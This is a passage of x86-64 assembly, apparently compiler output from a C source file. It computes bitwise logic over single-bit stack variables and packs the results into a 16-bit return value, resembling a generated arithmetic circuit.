killed $al killed $eax movb %al, -85(%rbp) movzbl -52(%rbp), %eax movzbl -59(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -86(%rbp) movzbl -52(%rbp), %eax movzbl -59(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -87(%rbp) movzbl -82(%rbp), %eax movzbl -71(%rbp), %ecx xorl %ecx, %eax movzbl -63(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -88(%rbp) movzbl -82(%rbp), %eax movzbl -71(%rbp), %ecx andl %ecx, %eax movzbl -71(%rbp), %ecx movzbl -63(%rbp), %edx andl %edx, %ecx orl %ecx, %eax movzbl -82(%rbp), %ecx movzbl -63(%rbp), %edx andl %edx, %ecx orl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -89(%rbp) movzbl -61(%rbp), %eax movzbl -64(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -90(%rbp) movzbl -61(%rbp), %eax movzbl -64(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -91(%rbp) movzbl -40(%rbp), %eax movzbl -80(%rbp), %ecx orl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -92(%rbp) movb -79(%rbp), %al movb %al, -93(%rbp) movzbl -68(%rbp), %eax movzbl -81(%rbp), %ecx xorl %ecx, %eax movzbl -85(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -94(%rbp) movzbl -68(%rbp), %eax movzbl -81(%rbp), %ecx andl %ecx, %eax movzbl -81(%rbp), %ecx movzbl -85(%rbp), %edx andl %edx, %ecx orl %ecx, %eax movzbl -68(%rbp), %ecx movzbl -85(%rbp), %edx andl %edx, %ecx orl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -95(%rbp) movzbl -72(%rbp), %eax movzbl -50(%rbp), %ecx xorl %ecx, %eax movzbl -86(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -96(%rbp) movzbl -72(%rbp), %eax movzbl -50(%rbp), %ecx andl %ecx, %eax movzbl -50(%rbp), %ecx movzbl -86(%rbp), %edx andl %edx, %ecx orl %ecx, %eax movzbl -72(%rbp), %ecx movzbl -86(%rbp), %edx andl %edx, %ecx orl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -97(%rbp) movzbl -87(%rbp), %eax movzbl -66(%rbp), %ecx xorl %ecx, %eax movzbl -73(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -98(%rbp) movzbl -87(%rbp), %eax movzbl -66(%rbp), %ecx andl %ecx, %eax movzbl -66(%rbp), %ecx movzbl -73(%rbp), %edx andl %edx, %ecx orl %ecx, %eax movzbl -87(%rbp), %ecx movzbl -73(%rbp), %edx andl %edx, %ecx orl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -99(%rbp) movzbl -89(%rbp), %eax movzbl -67(%rbp), %ecx xorl %ecx, %eax movzbl -74(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -100(%rbp) movzbl -89(%rbp), %eax movzbl -67(%rbp), %ecx andl %ecx, %eax movzbl -67(%rbp), %ecx movzbl -74(%rbp), %edx andl %edx, %ecx orl %ecx, %eax movzbl -89(%rbp), %ecx movzbl -74(%rbp), %edx andl %edx, %ecx orl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -101(%rbp) movzbl -90(%rbp), %eax movzbl -69(%rbp), %ecx xorl %ecx, %eax movzbl -76(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -102(%rbp) movzbl -90(%rbp), %eax movzbl -69(%rbp), %ecx andl %ecx, %eax movzbl -69(%rbp), %ecx movzbl -76(%rbp), %edx andl %edx, %ecx orl %ecx, %eax movzbl -90(%rbp), %ecx movzbl -76(%rbp), %edx andl %edx, %ecx orl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -103(%rbp) movzbl -45(%rbp), %eax movzbl -54(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -104(%rbp) movzbl -70(%rbp), %eax movzbl -77(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -105(%rbp) movzbl -70(%rbp), %eax movzbl -77(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -106(%rbp) movb -94(%rbp), %al movb %al, -107(%rbp) movzbl -96(%rbp), %eax movzbl -95(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -108(%rbp) movzbl -96(%rbp), %eax movzbl -95(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -109(%rbp) movzbl -88(%rbp), %eax movzbl -90(%rbp), %ecx xorl %ecx, %eax movzbl -98(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -110(%rbp) movzbl -88(%rbp), %eax movzbl -90(%rbp), %ecx andl %ecx, %eax movzbl -90(%rbp), %ecx movzbl -98(%rbp), %edx andl %edx, %ecx orl %ecx, %eax movzbl -88(%rbp), %ecx movzbl -98(%rbp), %edx andl %edx, %ecx orl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -111(%rbp) movzbl -91(%rbp), %eax movzbl -100(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -112(%rbp) movzbl -91(%rbp), %eax movzbl -100(%rbp), %ecx orl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -113(%rbp) movzbl -65(%rbp), %eax movzbl -102(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -114(%rbp) movzbl -65(%rbp), %eax movzbl -102(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -115(%rbp) movb -106(%rbp), %al movb %al, -116(%rbp) movzbl -75(%rbp), %eax movzbl -32(%rbp), %ecx xorl %ecx, %eax movzbl -93(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -117(%rbp) movb -75(%rbp), %al movb %al, -118(%rbp) movzbl -92(%rbp), %eax movzbl -42(%rbp), %ecx andl %ecx, %eax movzbl -92(%rbp), %ecx xorl $-1, %ecx movzbl -99(%rbp), %edx andl %edx, %ecx orl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -119(%rbp) movzbl -107(%rbp), %eax movzbl -55(%rbp), %ecx orl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -120(%rbp) movzbl -108(%rbp), %eax movzbl -57(%rbp), %ecx orl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -121(%rbp) movzbl -110(%rbp), %eax movzbl -109(%rbp), %ecx xorl %ecx, %eax movzbl -97(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -122(%rbp) movzbl -110(%rbp), %eax movzbl -109(%rbp), %ecx andl %ecx, %eax movzbl -109(%rbp), %ecx movzbl -97(%rbp), %edx andl %edx, %ecx orl %ecx, %eax movzbl -110(%rbp), %ecx movzbl -97(%rbp), %edx andl %edx, %ecx orl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -123(%rbp) movzbl -113(%rbp), %eax movzbl -111(%rbp), %ecx xorl %ecx, %eax movzbl -99(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -124(%rbp) movzbl -113(%rbp), %eax movzbl -111(%rbp), %ecx andl %ecx, %eax movzbl -111(%rbp), %ecx movzbl -99(%rbp), %edx andl %edx, %ecx orl %ecx, %eax movzbl -113(%rbp), %ecx movzbl -99(%rbp), %edx andl %edx, %ecx orl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -125(%rbp) movzbl -115(%rbp), %eax movzbl -112(%rbp), %ecx xorl %ecx, %eax movzbl -101(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -126(%rbp) movzbl -115(%rbp), %eax movzbl -112(%rbp), %ecx andl %ecx, %eax movzbl -112(%rbp), %ecx movzbl -101(%rbp), %edx andl %edx, %ecx orl %ecx, %eax movzbl -115(%rbp), %ecx movzbl -101(%rbp), %edx andl %edx, %ecx orl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -127(%rbp) movzbl -105(%rbp), %eax movzbl -114(%rbp), %ecx xorl %ecx, %eax movzbl -103(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -128(%rbp) movzbl -105(%rbp), %eax movzbl -114(%rbp), %ecx andl %ecx, %eax movzbl -114(%rbp), %ecx movzbl -103(%rbp), %edx andl %edx, %ecx orl %ecx, %eax movzbl -105(%rbp), %ecx movzbl -103(%rbp), %edx andl %edx, %ecx orl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -129(%rbp) movzbl -23(%rbp), %eax movzbl -104(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -130(%rbp) movzbl -78(%rbp), %eax movzbl -116(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -131(%rbp) movzbl -117(%rbp), %eax movzbl -86(%rbp), %ecx orl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -132(%rbp) movb -119(%rbp), %al movb %al, -133(%rbp) movzbl -120(%rbp), %eax movzbl -44(%rbp), %ecx orl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -134(%rbp) movb -121(%rbp), %al movb %al, -135(%rbp) movb -121(%rbp), %al movb %al, -136(%rbp) movb -122(%rbp), %al movb %al, -137(%rbp) movzbl -124(%rbp), %eax movzbl -123(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -138(%rbp) movzbl -124(%rbp), %eax movzbl -123(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -139(%rbp) movzbl -126(%rbp), %eax movzbl -125(%rbp), %ecx xorl %ecx, %eax movzbl -139(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -140(%rbp) movzbl -126(%rbp), %eax movzbl -125(%rbp), %ecx andl %ecx, %eax movzbl -125(%rbp), %ecx movzbl -139(%rbp), %edx andl %edx, %ecx orl %ecx, %eax movzbl -126(%rbp), %ecx movzbl -139(%rbp), %edx andl %edx, %ecx orl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -141(%rbp) movzbl -128(%rbp), %eax movzbl -127(%rbp), %ecx xorl %ecx, %eax movzbl -141(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -142(%rbp) movzbl -128(%rbp), %eax movzbl -127(%rbp), %ecx andl %ecx, %eax movzbl -127(%rbp), %ecx movzbl -141(%rbp), %edx andl %edx, %ecx orl %ecx, %eax movzbl -128(%rbp), %ecx movzbl -141(%rbp), %edx andl %edx, %ecx orl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -143(%rbp) movzbl -131(%rbp), %eax movzbl -129(%rbp), %ecx xorl %ecx, %eax movzbl -143(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -144(%rbp) movzbl -131(%rbp), %eax movzbl -129(%rbp), %ecx andl %ecx, %eax movzbl -129(%rbp), %ecx movzbl -143(%rbp), %edx andl %edx, %ecx orl %ecx, %eax movzbl -131(%rbp), %ecx movzbl -143(%rbp), %edx andl %edx, %ecx orl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -145(%rbp) movzbl -130(%rbp), %eax movzbl -145(%rbp), %ecx orl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -146(%rbp) movzbl -136(%rbp), %ecx andl $1, %ecx shll $0, %ecx movzwl -4(%rbp), %eax orl %ecx, %eax ## kill: def $ax killed $ax killed $eax movw %ax, -4(%rbp) movzbl -83(%rbp), %ecx andl $1, %ecx shll $1, %ecx movzwl -4(%rbp), %eax orl %ecx, %eax ## kill: def $ax killed $ax killed $eax movw %ax, -4(%rbp) movzbl -111(%rbp), %ecx andl $1, %ecx shll $2, %ecx movzwl -4(%rbp), %eax orl %ecx, %eax ## kill: def $ax killed $ax killed $eax movw %ax, -4(%rbp) movzbl -118(%rbp), %ecx andl $1, %ecx shll $3, %ecx movzwl -4(%rbp), %eax orl %ecx, %eax ## kill: def $ax killed $ax killed $eax movw %ax, -4(%rbp) movzbl -132(%rbp), %ecx andl $1, %ecx shll $4, %ecx movzwl -4(%rbp), %eax orl %ecx, %eax ## kill: def $ax killed $ax killed $eax movw %ax, -4(%rbp) movzbl -133(%rbp), %ecx andl $1, %ecx shll $5, %ecx movzwl -4(%rbp), %eax orl %ecx, %eax ## kill: def $ax killed $ax killed $eax movw %ax, -4(%rbp) movzbl -84(%rbp), %ecx andl $1, %ecx shll $6, %ecx movzwl -4(%rbp), %eax orl %ecx, %eax ## kill: def $ax killed $ax killed $eax movw %ax, -4(%rbp) movzbl -133(%rbp), %ecx andl $1, %ecx shll $7, %ecx movzwl -4(%rbp), %eax orl %ecx, %eax ## kill: def $ax killed $ax killed $eax movw %ax, -4(%rbp) movzbl -134(%rbp), %ecx andl $1, %ecx shll $8, %ecx movzwl -4(%rbp), %eax orl %ecx, %eax ## kill: def $ax killed $ax killed $eax movw %ax, -4(%rbp) movzbl -135(%rbp), %ecx andl $1, %ecx shll $9, %ecx movzwl -4(%rbp), %eax orl %ecx, %eax ## kill: def $ax killed $ax killed $eax movw %ax, -4(%rbp) movzbl -137(%rbp), %ecx andl $1, %ecx shll $10, %ecx movzwl -4(%rbp), %eax orl %ecx, %eax ## kill: def $ax killed $ax killed $eax movw %ax, -4(%rbp) movzbl -138(%rbp), %ecx andl $1, %ecx shll $11, %ecx movzwl -4(%rbp), %eax orl %ecx, %eax ## kill: def $ax killed $ax killed $eax movw %ax, -4(%rbp) movzbl -140(%rbp), %ecx andl $1, %ecx shll $12, %ecx movzwl -4(%rbp), %eax orl %ecx, %eax ## kill: def $ax killed $ax killed $eax movw %ax, -4(%rbp) movzbl -142(%rbp), %ecx andl $1, %ecx shll $13, %ecx movzwl -4(%rbp), %eax orl %ecx, %eax ## kill: def $ax killed $ax killed $eax movw %ax, -4(%rbp) movzbl -144(%rbp), %ecx andl $1, %ecx shll $14, %ecx movzwl -4(%rbp), %eax orl %ecx, %eax ## kill: def $ax killed $ax killed $eax movw %ax, -4(%rbp) movzbl -146(%rbp), %ecx andl $1, %ecx shll $15, %ecx movzwl -4(%rbp), %eax orl %ecx, %eax ## kill: def $ax killed $ax killed $eax movw %ax, -4(%rbp) movzwl -4(%rbp), %eax addq $18, %rsp popq %rbp retq .cfi_endproc ## -- End function .subsections_via_symbols
the_stack_data/168894484.c